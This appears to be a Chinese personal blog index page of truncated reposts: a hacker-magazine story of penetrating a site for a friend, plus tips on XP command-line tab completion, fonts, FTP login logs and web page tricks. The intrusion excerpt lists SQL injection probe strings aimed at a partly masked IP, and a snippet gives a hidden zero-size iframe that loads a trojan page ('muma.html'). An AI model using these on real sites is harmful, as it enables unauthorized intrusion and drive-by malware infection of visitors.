鬼仔's Blog

文章作者：Andyower 天使娃娃
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

注：本文已发表2005年9月的黑客防线.如有转载,请注名

近日,朋友说要我帮他弄一个站点,说那个站点有许多他想要的资料,他给出了站点www.***d.com,由于一些原因，所以本文有很多的截图都不能提供,希望大家可以谅解.

第一次渗透
先从主站入手,登陆上去看看,主站上面几乎都是静态的,只有一些新闻,而那些新闻是的注入点是连接到另外的一个IP,220.194.*.*/news.asp?id=111,试一下提交and 1=1,and 1=2,还有"news.asp?id=1'11","news.asp?id=11;1","news.asp?id=11 1","news.asp?id=11–1",全部返回正常,也就是说"'",";","–"," 阅读全文 »

ps:后来更新的
一、最简单的也是最有效的

<iframe src=http://www.xxx.com/muma.html width=0 height=0></iframe>

阅读全文 »

在XP的CMD环境下，按TAB键可以将目录项目一个一个的列出来

比如你切换到某一个目录下，命令是这样打的：
cd<空格>目录名

但是这时你把目录名字忘了，但是如果看到的话，你会认出来，或者目录名太长，懒得打。
这时你可以按TAB键，一个一个选择目录，这个目录不是的话，就再按下TAB键，直到找到你要的那个目录为止，然后回车就可以切换到你要的目录下了。当然，如果只是列目录的话，还是dir方便。不过有一点，dir看不到隐藏的目录，但是上面说的方法可以看到隐藏的目录，可以直接切换到隐藏的目录下。
同时也支持Shift+TAB来反向切换。
在XP下测试成功，2000和2003没有测试，不我想应该也可以的。

来源:Songzi Blog

我们有时去一些网站,如新浪、QQ等，进入首页后，
会在页面中弹出一个广告画面，几秒钟后消失，
这个效果是怎么做出来的呢，先看看测试页：

画中画效果

其实原理就是一个定义了一个隐藏的层，代码如下：

阅读全文 »

关于字体的一些东西.喜欢设计的朋友看下.
另外附上一个很不错的英文字体下载站, http://dafont.com/en/ 里面很多漂亮的字体.

来源:桥

• 1. 很多LOGO的字体都是标志设计师专门设计的，所以不要问比如”中国银行的中文书法字体叫什么？”这样的问题。但是很多国际公司都有自己专用的一套字体，比如迪斯尼。品牌字体这里有一些 >> http://www.typenow.net/themed.htm
• 2. 有些图片上的字体你很喜欢很想知道它是什么什么字体，这个网站可以告诉你答案。上传包含你喜欢字体的图片，剩下的问题它帮你解决，仅限于英文 >> http://www.myfonts.com/WhatTheFont/
• 3. 将下载的字体文件拷到/控制面板/字体文件夹下面就可以安装好字体。更好的办法是你把字体放在非系统盘里面自建的Font文件夹内，安装的时候进入/控制面板/字体，点菜单文件/安装新字体/找到你需要安装字体的路径，然后将”将字体复制到 Fonts 文件夹(C)”前面的选项去掉。两个好处：第一、系统崩溃，自己辛苦安装的字体都还在其他盘保存着；第二、系统干净速度快。

阅读全文 »

ftp登陆不了是很经常碰到的事
　　两个基本知识：
　　1 对方很可能暂时没开ftp
　　2 要学会看登陆错误指令 　　所谓登陆提示，是指登陆时你与服务器双向交流的一些指令及状态提示，你如果看到类似这样的字样，那就是了：
　　状态:> 正在获取列表“”…
　　状态:> 正在连接到 ftp 服务器 211.*.*.*:* (ip = 211.*.*.*:*)…
　　状态:> Socket 已连接。正在等候欢迎消息…
　　220 FTP服务器已启动
　　状态:> 已连接。正在验证…
　　命令:> USER software
　　331 User name okay, need password.
　　命令:> PASS *****
　　230 User logged in, proceed.
　　状态:> 登录成功。
　　命令:> PWD
阅读全文 »

来源:哈斯日志

用百度做个站内搜索，搜索结果无竞价排名，无右侧广告，示例。

代码（另存为html即可）：
阅读全文 »

完全打开页面后,在该页的在地址栏或按Ctrl+O输入以下代码,回车!

1.显示网页中的所有图片
阅读全文 »